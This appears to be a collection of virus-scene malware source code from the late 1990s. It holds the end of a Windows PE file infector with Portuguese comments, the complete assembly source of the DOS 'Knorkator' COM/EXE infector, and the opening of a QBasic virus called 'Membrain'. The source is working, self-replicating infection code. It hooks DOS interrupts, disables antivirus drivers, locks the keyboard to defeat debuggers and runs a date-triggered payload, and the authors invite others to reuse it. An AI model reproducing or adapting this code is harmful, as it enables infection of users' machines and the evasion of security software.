IMAGE_NT_HEADERS+4+(8*3)] push 0 push ofs temp push ecx push esi push ebx call dwo [ReadFile] ;lˆ SectionHeaders mov eax, [esi.SH_PointerToRawData] sub eax, [pe_ptr] sub eax, [tsecao] cmp eax, IMAGE_SIZEOF_SECTION_HEADER+SIZE IMAGE_NT_HEADERS jb fudeu ;nÆo tem espa‡o pra nova se‡Æo mov eax, [ebp.NT_OptionalHeader.OH_DirectoryEntries.DE_Import.DD_Size] test eax, eax jz fudeu ;nÆo tem ImportTable? mov edi, [ebp.NT_OptionalHeader.OH_DirectoryEntries.DE_Import.DD_VirtualAddress] add edi, -IMAGE_SIZEOF_IMPORT_DESCRIPTOR proxima_dll: add edi, IMAGE_SIZEOF_IMPORT_DESCRIPTOR lea esi, [edi.ID_Name] call le4 ;lˆ ponteiro pro nome da DLL jc fudeu

mov esi, eax call le8 ;pega 8 bytes do nome jc fudeu and eax, not 20202020h and ecx, not 00002020h ;passa nome da dll pra maiusculas xor eax, "NREK" jnz proxima_dll xor ecx, "23LE" ;verifica se ‚ a malvada jnz proxima_dll mov esi, edi ;[edi.ID_Characteristics] call le4 jc fudeu push eax lea esi, [edi.ID_FirstThunk] call le4 pop esi ;esi=lista de nomes test eax, eax jz fudeu mov edi, eax test esi, esi ;existe uma HintTable? jnz nomes_separados mov esi, edi ;nÆo, ‚ tudo o mesmo nomes_separados: add edi, [ebp.NT_OptionalHeader.OH_ImageBase] ;edi=ponteiros no EXE call para_correcao sub eax, eax mov [GMHA], eax mov [GPA], eax ;limpa endere‡os mov [host_createthread], eax le_nome: call le4 jc ve_se_deu test eax, eax ;j foram todas as APIs? jz ve_se_deu push esi lea esi, [eax+2] ;pula ordinal order call le8 jc le_proxima cmp eax, "MteG" ;verifica se ‚ GetModuleHandleA jne ve_gpa cmp ecx, "ludo" jne le_proxima ;GetModul????dleA add esi, 8 call le8 jc le_proxima cmp ecx, "Aeld" jne le_proxima mov [GMHA], edi jmp le_proxima ve_gpa: cmp eax, "PteG" ;verifica se ‚ GetProcAddress

jne ve_ct cmp ecx, "Acor" jne le_proxima ;GetProcA???? mov [GPA], edi jmp le_proxima ve_ct: cmp eax, "aerC" ;verifica CreateThread jne le_proxima cmp ecx, "hTet" jne le_proxima add esi, 8 call le4 jc le_proxima cmp eax, "daer" jne le_proxima mov [host_createthread], edi jmp le_proxima le_proxima: pop esi add esi, 4 ;verifica proxima API do host add edi, 4 jmp le_nome ve_se_deu: sub eax, eax cmp [GMHA], eax jz fudeu cmp [GPA], eax ;todas 3 APIs foram obtidas? jz fudeu cmp [host_createthread], eax jz fudeu inc wo [ebp.NT_FileHeader.FH_NumberOfSections] lea esi, [ebp+(SIZE IMAGE_NT_HEADERS+4+(8*3))-IMAGE_SIZEOF_SECTION_HEADER] mov ecx, (ofs fim_loader-ofs loader) mov eax, [esi.IMAGE_SIZEOF_SECTION_HEADER.SH_SizeOfRawData] mov edx, [esi.IMAGE_SIZEOF_SECTION_HEADER.SH_VirtualSize] sub eax, edx jbe fudeu cmp eax, ecx jbe fudeu ;pouco espa‡o de "slack" push edx ;edx=tamanho da primeira se‡Æo add edx, [esi.IMAGE_SIZEOF_SECTION_HEADER.SH_PointerToRawData] mov [lugarloader], edx pop edx add [esi.IMAGE_SIZEOF_SECTION_HEADER.SH_VirtualSize], ecx ;aumenta pro loader add edx, [esi.IMAGE_SIZEOF_SECTION_HEADER.SH_VirtualAddress] mov eax, [ebp.NT_OptionalHeader.OH_AddressOfEntryPoint] test eax, eax ;entrypoint=0 jz fudeu mov [ebp.NT_OptionalHeader.OH_AddressOfEntryPoint], edx sub eax, edx ;calcula salto relativo sub eax, (ofs fim_loader-ofs loader)

add edx, [ebp.NT_OptionalHeader.OH_ImageBase] mov [entrypoint], edx mov [endereco_host], eax call segue_correcao mov edx, [esi.IMAGE_SIZEOF_SECTION_HEADER.SH_VirtualAddress] add esi, [tsecao] add [tsecao], IMAGE_SIZEOF_SECTION_HEADER lea edi, [esi.IMAGE_SIZEOF_SECTION_HEADER.SH_Name] mov eax, [chave] push eax and eax, 0f0f0f0fh add eax, "AAAA" stosd pop eax ror eax, 17 and eax, 0f0f0f0fh ;inicia cria‡Æo da nova se‡Æo add eax, "AAAA" stosd mov [esi.IMAGE_SIZEOF_SECTION_HEADER.SH_Characteristics], IMAGE_SCN_MEM_WRITE + \ IMAGE_SCN_MEM_READ + IMAGE_SCN_CNT_INITIALIZED_DATA mov eax, [esi.SH_SizeOfRawData] add eax, [esi.SH_PointerToRawData] call alinha_file mov [esi.IMAGE_SIZEOF_SECTION_HEADER.SH_PointerToRawData], eax mov [escreve], eax ;onde vamos escrever o virus mov eax, [esi.SH_VirtualSize] add eax, [esi.SH_VirtualAddress] call alinha_mem mov [esi.IMAGE_SIZEOF_SECTION_HEADER.SH_VirtualAddress], eax add eax, [ebp.NT_OptionalHeader.OH_ImageBase] call para_correcao mov [virus_pointer], eax add eax, ofs entrada-ofs v_ini mov [vofs], eax ;onde vai estar o codigo encriptado call segue_correcao mov eax, (ofs v_fim-ofs v_ini)*2 push eax call alinha_file mov [esi.IMAGE_SIZEOF_SECTION_HEADER.SH_SizeOfRawData], eax add eax, [escreve] mov [tamanho_total], eax ;tamanho final do arquivo pop eax call alinha_mem mov [esi.IMAGE_SIZEOF_SECTION_HEADER.SH_VirtualSize], eax add eax, [esi.IMAGE_SIZEOF_SECTION_HEADER.SH_VirtualAddress] add eax, edx call alinha_mem cmp [ebp.NT_OptionalHeader.OH_SizeOfImage], eax jae ja_ta ;arquivo j ‚ grande suficiente? mov [ebp.NT_OptionalHeader.OH_SizeOfImage], eax ja_ta:

mov [ebp.NT_OptionalHeader.OH_CheckSum], 0 inc dwo [infectou?] mov eax, [pe_ptr] sub eax, 4 push 0 push 0 push eax push ebx ;vai at‚ PE header-4 call dwo [SetFilePointer] push 0 push ofs temp push 4 push ofs marca push ebx ;escreve marca de infe‡Æo call dwo [WriteFile] push 0 push ofs temp push SIZE IMAGE_NT_HEADERS push ebp push ebx ;escreve pe header modificado call dwo [WriteFile] lea esi, [ebp+SIZE IMAGE_NT_HEADERS+4+(8*3)] push 0 push ofs temp push [tsecao] push esi push ebx ;escreve SectionHeaders call dwo [WriteFile] push 0 push 0 push [lugarloader] push ebx ;vai pro final da 1§ se‡Æo call dwo [SetFilePointer] push 0 push ofs temp push (ofs fim_loader-ofs loader) push ofs loader push ebx ;escreve o loader call dwo [WriteFile] push PAGE_READWRITE push MEM_RESERVE+MEM_COMMIT push (ofs v_fim-ofs v_ini)*4 ;pega memoria pra encriptar virus push 0 call dwo [VirtualAlloc]; test eax, eax ;se falhar, fudeu pra valer!; jz $ push MEM_RELEASE push 0 push eax ;parƒmetros pra liberar memoria mov edi, eax mov esi, ofs v_ini

mov ecx, (ofs entrada-ofs v_ini) rep movsb ;copia desencriptador push ebx ;salva handle do arquivo mov ecx, (ofs v_fim-ofs entrada)/4 mov ebx, [chave] encripta: sub edx, edx lodsd div ebx stosd ;guarda quociente mov eax, edx stosd ;guarda resto loop encripta pop ebx push 0 push 0 push [escreve] push ebx ;vai pra nossa se‡Æo call dwo [SetFilePointer] push 0 push ofs temp push ((ofs v_fim-ofs entrada)*2+(ofs entrada-ofs v_ini)) push dwo [esp+(3*4)] push ebx ;escreve o virus call dwo [WriteFile] call dwo [VirtualFree] ;libera memoria push 0 push 0 push [tamanho_total] push ebx ;vai at‚ novo final call dwo [SetFilePointer] push ebx ;marca final do arquivo call dwo [SetEndOfFile] fudeu: lea esi, [ebp+SIZE IMAGE_NT_HEADERS+4] push esi lodsd xor [rnd], eax lodsd push esi ;esi+=8 lodsd lodsd xor [rnd], eax push esi ;esi+=8 push ebx call dwo [SetFileTime] ;restaura FILETIME puta_que_pariu: call dwo [CloseHandle] mov ecx, [infectou?] jecxz ja_infectado push 20*1000

call dwo [Sleep2] ;se infectou, descansa um pouco ja_infectado: push dwo [ebp+SIZE IMAGE_NT_HEADERS] push dwo [esp+(8*4)+4+LOCAL_DATA+4] call dwo [SetFileAttributesA] ;restaura atributos puta_merda: add esp, LOCAL_DATA popad ret 4

le4: push 0 push esp ;buffer push esi ;rva para ler push 4 ;tamanho da leitura call le_rva pop eax ret

le8: push 0 push 0 push esp ;buffer push esi ;rva para ler push 8 ;tamanho da leitura call le_rva pop eax pop ecx ret

le_rva: pushad lea esi, [ebp+(SIZE IMAGE_NT_HEADERS+4+(8*3))] movzx ecx, wo [ebp.NT_FileHeader.FH_NumberOfSections] proximo_header: mov eax, [esp+(8*4)+8] sub eax, [esi.SH_VirtualAddress] ;tira base da se‡Æo do rva jc caralho cmp eax, [esi.SH_VirtualSize] ;aponta dentro? jb converte caralho: add esi, IMAGE_SIZEOF_SECTION_HEADER loop proximo_header erro: stc pula_stc: popad ret 3*4 converte: add eax, [esi.SH_PointerToRawData] ;some inicio da se‡Æo push 0

push 0 push eax push ebx call dwo [SetFilePointer] ;ajusta ponteiro inc eax jz erro push 0 push ofs temp push dwo [esp+(8*4)+4+(2*4)] push dwo [esp+(8*4)+12+(3*4)] push ebx call dwo [ReadFile] ;le valor test eax, eax jz erro jmp pula_stc

alinha_file: push ecx mov ecx, [ebp.NT_OptionalHeader.OH_FileAlignment] jmp alinha

alinha_mem: push ecx mov ecx, [ebp.NT_OptionalHeader.OH_SectionAlignment] alinha: dec ecx add eax, ecx not ecx and eax, ecx pop ecx ret

verifica: pushad sub esp, IMAGE_SIZEOF_DOS_HEADER mov ebp, esp sub esi, esi mov dwo [esp+IMAGE_SIZEOF_DOS_HEADER.Pushad_eax], -1 ;sinaliza erro push esi push FILE_ATTRIBUTE_NORMAL push OPEN_EXISTING push esi push esi push GENERIC_READ+GENERIC_WRITE push dwo [esp+(8*4)+(6*4)+4+IMAGE_SIZEOF_DOS_HEADER] call dwo [CreateFileA] mov ebx, eax inc eax jz nao_deu push ebx ;parƒmetro para CloseHandle push esi

push ofs temp push IMAGE_SIZEOF_DOS_HEADER push ebp push ebx call dwo [ReadFile] test eax, eax jz fecha_arquivo xor dwo [temp], IMAGE_SIZEOF_DOS_HEADER jnz fecha_arquivo xor wo [ebp], IMAGE_DOS_SIGNATURE jnz fecha_arquivo ;‚ um arquivo EXE? mov eax, [ebp.MZ_lfanew] mov [pe_ptr], eax add eax, -4 push esi push esi push eax push ebx ;vai at‚ PE header-4 call dwo [SetFilePointer] inc eax jz fecha_arquivo push esi push ofs temp push 4 ;lˆ 1 dword push ebp push ebx call dwo [ReadFile] test eax, eax jz fecha_arquivo xor dwo [temp], 4 jnz fecha_arquivo xor dwo [ebp], 12345678h org $-4 marca dd -1 jz fecha_arquivo mov dwo [esp+IMAGE_SIZEOF_DOS_HEADER.Pushad_eax+4], 0 ;sinaliza nÆo infectado pop dwo [esp+IMAGE_SIZEOF_DOS_HEADER.Pushad_ebx] ;salva e remove handle jmp nao_deu fecha_arquivo: call dwo [CloseHandle] nao_deu: sub esp, -IMAGE_SIZEOF_DOS_HEADER popad ret 4

reloctable dw RELOCS dup ("Re")

kernel32 db "KERNEL32.DLL", 0

kernel32API db "CreateThread", 0 db "CreateFileA", 0

db "CloseHandle", 0 db "VirtualAlloc", 0 db "SetThreadPriority", 0 db "ResumeThread", 0 db "ReadFile", 0 db "SetFilePointer", 0 db "GetFileTime", 0 db "SetFileTime", 0 db "GetFileAttributesA", 0 db "SetFileAttributesA", 0 db "WriteFile", 0 db "SetEndOfFile", 0 db "VirtualFree", 0 db "GetTickCount", 0 db "GetDriveTypeA", 0 db "SetCurrentDirectoryA", 0 db "FindFirstFileA", 0 db "FindNextFileA", 0 db "FindClose", 0 db "lstrlen", 0 db "Sleep", 0 db "DeleteFileA", 0 db "SuspendThread", 0 db 0

;org 01D2Ahcrc32 dd "CRC-" ;alinhado num multiplo de 249

final_virus equ $

temp dd ?pe_ptr dd ?tsecao dd ?lugarloader dd ?escreve dd ?tamanho_total dd ?rnd dd ?thread_id dd ?thread_corrige dd ?tabela dd ?espera dd ?infectou? dd ?

CreateThread_ dd ?CreateFileA dd ?CloseHandle dd ?VirtualAlloc dd ?SetThreadPriority dd ?ResumeThread dd ?ReadFile dd ?SetFilePointer dd ?

GetFileTime dd ?SetFileTime dd ?GetFileAttributesA dd ?SetFileAttributesA dd ?WriteFile dd ?SetEndOfFile dd ?VirtualFree dd ?GetTickCount dd ?GetDriveTypeA dd ?SetCurrentDirectoryA dd ?FindFirstFileA dd ?FindNextFileA dd ?FindClose dd ?lstrlen dd ?Sleep2 dd ?DeleteFileA dd ?SuspendThread dd ?

align 4

v_fim equ this byte ;final do codigo viral

_GMHA dd 0_GPA dd 0 ;variaveis usadas pelo stubtempo dd 0

.code

start: push 4 ;stub do virus @pushsz "Virus KalaMarai" @pushsz "Deseja continuar?" push 0 extrn MessageBoxA:PROC call MessageBoxA cmp al, 6 ;confirma execu‡Æo do virus je vaila saifora: push 0 extrn ExitProcess:PROC call ExitProcess ;ihhh... usu rio amarelou! vaila: extrn GetModuleHandleA:PROC mov eax, ofs GetModuleHandleA mov [_GMHA], eax ;salva ponteiros para APIs essenciais mov eax, ofs _GMHA mov [GMHA], eax extrn GetProcAddress:PROC mov eax, ofs GetProcAddress mov [_GPA], eax

mov eax, ofs _GPA mov [GPA], eaxBASE=00400000h mov ebp, BASE ;ebp=imagebase mov esi, [ebp.MZ_lfanew] add esi, ebp ;esi=pe header mov ecx, [esi.NT_OptionalHeader.OH_DirectoryEntries.DE_BaseReloc.DD_Size] mov esi, [esi.NT_OptionalHeader.OH_DirectoryEntries.DE_BaseReloc.DD_VirtualAddress] add esi, ebp ;esi=reloca‡äes lea edx, [esi+ecx] ;edx=limite mov edi, ofs reloctable reloca: cmp dwo [esi], ofs v_ini-BASE ;bloco aponta para o virus? jnb aponta add esi, [esi+4] ;nÆo, pega proximo bloco cmp esi, edx jb reloca ;ainda existem reloca‡äes? push (ofs v_fim-ofs v_ini) push 40h extrn GlobalAlloc:PROC call GlobalAlloc ;aloca alguma memoria mov ebp, eax mov edi, eax mov esi, ofs v_ini mov ecx, (ofs v_fim-ofs v_ini) ;copia virus(pra testar relocs) rep movsb push ecx ;ecx=zero push esp ;*ThreadID push ecx push ecx add ebp, ofs entrada-ofs v_ini push ebp ;ebp=inicio do virus push ecx push ecx extrn CreateThread:PROC call CreateThread ;executa virus pop eax pergunta: push 4 @pushsz "Virus KalaMarai" @pushsz "Terminar processo?" push 0 extrn MessageBoxA:PROC call MessageBoxA cmp al, 6 ;termina processo de infe‡Æo? je saifora add [tempo], 5*60*1000 ;5,10,15... push dwo [tempo] extrn Sleep:PROC call Sleep ;espera 5+ minuto jmp pergunta ;pergunta de novo...

aponta: push edx ;reloca‡Æo aponta para o virus mov edx, [esi] sub edx, 2000h ;base das reloca‡äes lodsd lodsd xchg ecx, eax sub ecx, 8 shr ecx, 1 ;ecx=numero de reloca‡äes sub eax, eax proxima: lodsw test eax, eax ;reloca‡Æo nula? jz nula and ax, 0000111111111111b ;limpa TIPO add eax, edx not ax stosw ;armazena deslocamento da anterior inc dwo [numeroreloc] nula: loop proxima pop edx jmp reloca ;bloco processado...

end start

; [VirusName] : Knorkator; [VirusAutor]: Acid Bytes; [Type] : TSR COM/EXE/BIN/OVL/OVR infector; [Date] : 09/10/99; [Special F.]: Some retro/anti-debug technics, safety checks and error handling. It infects on:; execute, open, ext. open, delete, attrib, rename, create and close !!!; [Based on] : The virus code is based on no-frills code, using direct manipulation; of the MCB chain. ; [Size] : 1000 bytes; [Info] : This is just a funny virus, with funny payload and so on, nothing really ; groundbreaking or new. The code is commented, so newbies may learn from it.; Feel free to use some of the code in your own virus if you like to.; [Detection] : -AVPv3.0 (build129)-->suspicous,type:ComTsr; -AVGv6.0 --->detected as infected/not specific; -Norton Antivirus v5.00.01 --->no detection; -IKARUS virusUTILITIES v3.13a --->no detection; -Thunderbyte AntiVirus v8.07pro --->detected as Burma.1 virus; --->flags: c,F,L,M,Z,O,B,X,t (guess thats all a virus can have,hehe); U see, like said it's a fun-virus, which is not prepared to survive in the wild.

; [Contact] : acidbytes@gmx.net -> IRC: Undernet/#vir/#virus; ____________________________________________________________________________________________; [Compile] : TASM /m knork.asm; : TLINK /t knork.obj; ____________________________________________________________________________________________

.286 ;use .286 instructions

.model tiny ;like it says

.codeJUMPS ;this code is for TASM onlyorg 100h ;100h is where to .com file starts

virusstart:jmp real_begin ;Virus jumps to the real beginning of code

Anti_Debug: in al,20 ;get IRQ status...or al,2 ;Disable IRQ 1 (keyboard)out 20,al ;--->KEYBOARD SUCCESSFULLY LOCKED!int 3 ;stops the debugger on each loop int 3 ;when the debugger ;stops here, the keyboard will be disabled, ;so the user can't do anything! ;thanx to Sepultura for this one...

loop Anti_Debug

mov cx,0ffffh ;Thanx goes out to Septic forfprot_loop: ;this piece of codejmp back ;It should fool F-protmov ax,4c00h ;and some debuggers if tryingint 21h ;to trace through theint 20h ;Codeback:loop fprot_loop

real_begin:

set_some_equals: ;set some equals like "variables"vsize equ buffer-startpsize equ (handle-start+2)/10h+1EXE_dsp equ EXE_dispatch-COM_dispatchfname equ buffer+1ahhandle equ fname+1dh

start:anti_vsafe:mov ax,0fa01h ;removes resident VSAFE from memorymov dx,5945h ;i know that nobody's using VSAFE anymore,but

int 16h ;i just like that small anti-ms routine

DisableNAVTSR:mov ax,0FE02H ;this disables Norton AntiVirus 4.0 "NAVTSR" resident driver.mov si,4E41H ;-> this was taken from VLAD#6, thanks to "Mouth of Sauron"mov di,4E55Hint 2FH

;---------------------------------------------------------------------------------------------; The payload (display a message, creating directories) will only activate on; friday the 21st...The next routine checks the date;---------------------------------------------------------------------------------------------PayloadLoadChecker:mov ah,2ah ;Get system date function int 21h ;do!cmp al,5h ;compare...if it's fridayjne startvir ;if not so jump to startvir mov ah,2ah ;get dateint 21h ;do!cmp dl,15h ;see if it's the 21st (21 is 15 in hex)jne startvir ;jump to startvir if not equal

payload: ;this is the payload, it shows the Knorkator-Message on the mov ah,9h ;screen...and creates 3 subdirs on the HD lea dx, messageint 21h

mov ah,39h ;create new directory functionlea dx, dirname1 ;cx=name of directory --> "STUMPEN!"int 21h ;do!mov ah,39h lea dx, dirname2 ;creates "ALFATOR!" int 21h mov ah,39h lea dx, dirname3 ;creates "BUZZDEE!"int 21h ;-------------------------------------------------------------------------------------; Here does the payload end, and the virus begins;-------------------------------------------------------------------------------------

startvir: pusha ;save registers push ds push es push cs ;set cs=ds=es-->so they are equal filled push cs pop ds pop es res_check: mov ax,3030h ;is the virus already resident?

int 21h ;do! cmp ax,303h ;compares ax to 303h jne install ;if not equal->go resident cmp bx,ax jnz install ;no? jmp short dispatch ;yeah, let the proggie go

install: mov ah,52h ;SYSVARS-> get list! int 21h ;do! mov ax,es:[bx-2] ;gets the segment of the first MCB

xor si,si ;empty SI(set zero) find_mem: ;trace through the MCB chain mov ds,ax cmp byte ptr [si],'Z' ;last block is marked with Z je found_MCB ;if found last block of MCB goto found_MCB! mov bx,ax ;if not found->save the segment of the previous one add ax,[si+3] ;off to the next one INC AX jmp short find_mem ;run the routine again to find memory found_MCB: cmp word ptr [si+3h],psize ;compare the ammount of found memory to virus size jae fix_block ;if size is equal or more goto fix_block mov ds,bx ;if not-> use the previous one xchg ax,bx ;set ax=bx fix_block: sub word ptr [si+3],psize ;substract the virus size from memory block add ax,word ptr [si+3] ;find its end(add the memory size to ax) inc ax mov word ptr [si+12h],ax ;feed new value to the owner's PSP mov es,ax push cs pop ds mov di,100h mov si,offset start mov cx,vsize rep movsb ;copy the virus

push esmov ax,offset get_int21hpush axretf

get_int21h: mov ax,3521h ;get the adress of int 21h! int 21h ;do it!

push cs

pop ds mov word ptr [old_21h],bx ;save the old int21 in bx mov word ptr [old_21h+2],es ;save old int21+2 bytes in es mov ax,2521h ;set the new int 21h-function mov dx,offset int21h_handler ;put the int21h-handler in dx int 21h ;do! dispatch: jump db 0e9h ;determines how the file is beeing dispatched dest dw 0 ;this structure is also used in COM infection

autor_and_name db '[Knorkator]',0 db '(c) 1999 Acid Bytes',0 COM_dispatch: pop es pop ds popa mov si,offset csip ;where the old code is saved mov di,100h push di movsw ;restore first 3 bytes movsb pop di xor si,si jmp di ;go there EXE_dispatch: mov si,offset sssp cli lodsw mov ss,ax ;restore stack lodsw mov sp,ax sti pop es pop ds popa db 0eah ;jmp far to the csip address csip dd 0 sssp dd 0 int21h_handler: cmp ax,3030h ;compares ax to 3030h(if equal) je install_check ;if equal (means NOT resident) -->jump to installation check cmp ah,3ch ;if ah=3ch(create file f.) then je create ;jump to "create" cmp ah,3dh ;if ah=3dh(open file function) then je open ;jump to "open" cmp ah,3eh ;if ah=3eh(close file function) then je close ;jump to "CLOSE"

cmp ah,41h ;if "UNLINK"-function je open ;jump to "open" cmp ah,4bh ;if "EXECUTE"-function je open ;jump to "open" cmp ah,43h ;if "CHMOD" je open ;jump to "open" cmp ah,56h ;if "RENAME" je open ;jump to open cmp ax,6c00h ;if extended open/create THEN je extopen ;jump to EXTENDED OPEN return_21h: db 0eah ;jmp far to the old int 21h vectorold_21h dd 0 install_check: mov ax,303h mov bx,ax _iret: iret ;useful iret opcode create: mov si,dx call save_name ;call the save the file's name-routine call int21h ;call int21h-handler mov word ptr cs:[handle],ax ;save its handle in ax iret ;return close: push bx ;save handle call int21h ;call int21h-handler push cs pop ds mov dx,offset fname ;set ds:dx to file's name/put filename in dx pop ax cmp ax,word ptr cs:[handle] ;same handle as the one we saved? je ext_entry ;if the same --> continue iret ;else, get outta here extopen: pusha push ds push es mov dx,si ;moves the dx-value(filename) to si jmp short letsgo ;jump to letsgo ext_entry: mov ah,30h ;DOS version check ;this is needed because closed files aren't specially ;handled, they use the same routinesopen:

pusha push ds push es letsgo: push cs pop ds push cs pop es mov cx,6 cld call save_name ;call the save_name-routine(save the name for later use) mov dx,di mov si,di lodsw ;get first two chars of filename and ax,0dfdfh ;capitalise them k_check: scasw ;check if they match those of bad files je fn_return ;if found "good one" jump to fn_return loop k_check ;loops the k_check until finding a good one k_zero: lodsb ;find the zero in the ascii string or al,al jnz k_zero ;jump to k_zero if not zero sub si,4 ;substract 4 from si-value mov cx,5 ;move 5 do cx mov di,offset exts ;check if the extensions match with those lodsw ;we can infect and ax,0dfdfh ext_check: scasw je ext_verify ;if they match then jump to ext_verify inc di loop ext_check ;loop ext_check until match jmp short fn_return ;jump to fn_return ext_verify: lodsb and al,0dfh scasb je fn_return jmp short set24h_handler close_file: mov ah,3eh ;close file function call int21h ;call int21h-handler pop ax ;reset attributes pop cx

mov dx,offset fname ;put fname in dx call int21h ;call int21h-handler reset_int24h: pop ax pop dx pop ds call int21h ;call int21h-handler(resets int 24h) fn_return: pop es ;restore all registers pop ds popa jmp return_21h ;jumps to return_21h (proceed with the original call) set24h_handler: mov ax,3524h ;point int 24h to an iret opcode call int21h ;call int21h-handler push es push bx mov ax,2524h push ax mov dx,offset _iret call int21h ;call int21h-handler push cs pop ds push cs pop ds open_file: mov dx,offset fname ;put fname in dx mov ax,4300h call int21h ;do! push cx ;save attributes mov ax,4301h xor cx,cx ;clear attributes (no attributes) push ax call int21h ;do! mov ax,3d02h ;open file read/write function call int21h ;do! mov di,offset handle ;save file handle in di stosw xchg ax,bx ;move handle from ax into bx process_file: mov ax,5700h call int21h ;call int21h-handler push cx push dx mov cx,ax ;check for previous infection (time stamp) shr ax,6

or al,00011111b ;is seconds/2 = minutes/2? or cl,00011111b cmp al,cl je bomb_out ;if already infected, jump to bomb_out mov ah,3fh ;if not-->read in 1ah bytes (EXE header) mov cx,1ah mov dx,offset buffer ;put virus size in dx mov si,dx call int21h ;call int21h-handler lodsw xchg ax,bp call lseek_EOF cmp bp,'MZ' ;true MZ EXE-check je EXE_file ;if yes, jump to EXE_file cmp bp,'ZM' ;sometimes the signature is "ZM" then je EXE_file ;jump to EXE_file too COM_file: ;else, assume it's a COM file or dx,dx jnz bomb_out ;we can't infect .com files over 64k sub ax,3 ;substract 3 from the file size mov di,offset dest stosw ;write it into a jmp near instruction dec si dec si mov di,offset csip ;save the original code movsw movsb call lseek_BOF mov ah,40h mov cx,3 mov dx,offset jump call int21h ;call int21h-handler (write the jmp near) xor ax,ax ;set ax,ax(set ax=0)(dispatched as COM) stosw jmp write_end ;jump to write_end(routine writes virus to file-end) bomb_out: pop dx ;restore registers pop cx ;and jmp close_file ;jump to close_file EXE_file: push dx push ax push dx push ax lodsw ;get part_pag xchg bp,ax lodsw ;get pag_cnt mov cx,200h

mul cx add ax,bp pop cx ;save registers pop bp cmp ax,cx ;is declared size the real physical size? jb bomb_out ;get out of here, if size is below cmp dx,bp ;----> jb bomb_out ;---->same here save_old_shit: ;save old cs:ip and ss:sp mov di,offset buffer ;moves the virussize to di cmp word ptr [di+18h],40h jae bomb_out ;get out here if above or equal push di ;save di mov si,offset buffer+0eh mov di,offset sssp movsw ;old ss movsw ;old sp lodsw mov di,offset csip movsw ;old ip movsw ;old cs fix_csip: pop di pop ax ;calculate new cs:ip pop dx mov cl,0ch shl dx,cl push ax mov cl,4 shr ax,cl add dx,ax shl ax,cl pop cx sub cx,ax mov word ptr [di+14],cx ;ip mov word ptr [di+16],dx ;cs fix_sssp: ;set new ss:sp mov word ptr [di+0eh],dx mov ax,0fffeh mov word ptr [di+10h],ax fix_pages: ;do pag cnt and part pag pop ax ;reload virus size into dx:ax pop dx ;restore dx add ax,vsize ;adds virussize to ax adc dx,0 mov cx,200h div cx

or dx,dx jz no_inc inc ax no_inc: ;adjust the page data mov word ptr [di+2],dx ;part pag mov word ptr [di+4],ax ;pag cnt all_done: mov ax,EXE_dsp mov di,offset dest stosw call lseek_BOF mov ax,40h mov cx,1ah mov dx,offset buffer call int21h ;write the new header,do it! write_end: ;write the body to the end call lseek_EOF ;call "seek to end of file" mov ah,40h mov cx,vsize mov dx,offset start call int21h pop dx pop cx mov cx,ax shr ax,6 and al,00011111b ;set our marker (time stamp) and cl,11100000b or cl,al ;seconds/2 = minutes/2 mov ax,5701 call int21h jmp close_file ;all done

int21h: ;do an int 21h call pushf call dword ptr cs:[old_21h] ret lseek_BOF: ;lseek to beginning of file xor al,al jmp short lseek lseek_EOF: ;lseek to the end of file mov al,02h lseek: mov ah,42h ;just lseek xor cx,cx ;equalize cx (set cx=0)

cwd call int21h ;calls int21h handler ret save_name: mov di,offset fname ;saves the file name in di mov cx,0dh ;source = ds:si, destination = es:di rep movsb ret names db 'SCCLVSVINATBF',0dh ;files, which we don't want to infect exts db 'COMEXEBINOVLOVR' ;files we want to infect!

message db 'We have been in Flechtingen/Germany on 05/21/99.' db ' Knorkator rules!' db ' Cmon, its ' db 'friday the 21st-take some friends together and njoy life...' db 0Dh, 0Ah, '$'

dirname1 db 'STUMPEN!',0dirname2 db 'ALFATOR!',0dirname3 db 'BUZZDEE!',0

buffer: end virusstart

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$-=phr0q's programming fundz presents=-$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ -=[X<THE>X]=---------------------------------------------------- __ __ __ __ __ ______________ __ __ __ / \ / \ / \____/ \ \ / \ \ _ \ /\ / \| \ | | \ \_/ / \ ______/ \_/ / |\ /|_) // ,\ \ /| \| | | |\_/| | | __) `| |\_/| | |/ < _ </ _ \| || |\\ | | | | | | |______.| | | | |\ \ | \ \ / \ \ || | \ | / \ / \ / ____ \ \ / \ |/ / \ / \\ / \ \/ \ / \ \___/ \___/ \__/ \__/___/ \___/____/__/ \__// \__/_/\__/ \__/

"'spect tha throbbin pulse" --------------------------------------------------=[X<VIRUS>X]=- $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$by phr0q (a.k.a Krimson Kaper (HEH)) $$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

-=[INTRO]=-

Welcome to the first virus ever for Qbasic (QuickBASIC 4.5 actually) made by phr0q that aCtually WORKS! The often hyped basvir virus that some fool from the 80's made doesnt work sorry to say because i looked at it and it aint fool proof. i present to you The Membrain virus. HEH.

-=[SHOUTS]=-

SHouts goes out to nugz, my MAIN man. . ehhe. Evasion and like... mike w. and mel and... other people in #QuickBasic for the help even though they hate virii and the people in #virus for some ideas which had nothing to do with this. And... umm.. thats it.. HEH.

-=[ABOUT]=-

You know that i like finished this virus a long as time ago like about last year and i was to lazy to spread it since it was one of my first working virii. i guess.. um. this was coded in Quick BASIC because everyone believes that BASIC is limited and NOTHING can be done with it. I come to prove you wrong! HEh. If you want to read some of my old excerpts and stuff feel free to visit http://members.tripod.com/phr0q/text and i will have some viral related stuff. Also check out phr0q.com and the /virii section when i do get stuff done. ANY ways to get to the point i was so interested in virii back in the day. i just wanted to say Douglas Adams aka psykosis or some shit, you are gay and i made a virus with Qb when you said u could but couldnt. On a non personal note i present you with the final build for the membrain virus.

------------- Membrain.bas ---[Cut here]DECLARE FUNCTION CurrentDirectory$ ()DECLARE SUB DELAY (howlong!)DECLARE SUB Payload ()DECLARE FUNCTION NAME$ ()DECLARE FUNCTION CRYPT$ (CODE$)DECLARE FUNCTION DECRYPT$ (CODE$)DIM byte(1 TO 12000)DIM Buffer AS LONGCOMMON SHARED f$, ext$, FERROR, BAX$, CODE$, A$BAX$ = "^b^"PayloadMAIN:CLOSESHELL "IF EXIST DEL TEMP.tmp"SHELL "DIR " + " " + DECRYPT$("43") + " > TEMP.tmp"OPEN "TEMP.tmp" FOR INPUT AS #1FOR A = 1 TO 5

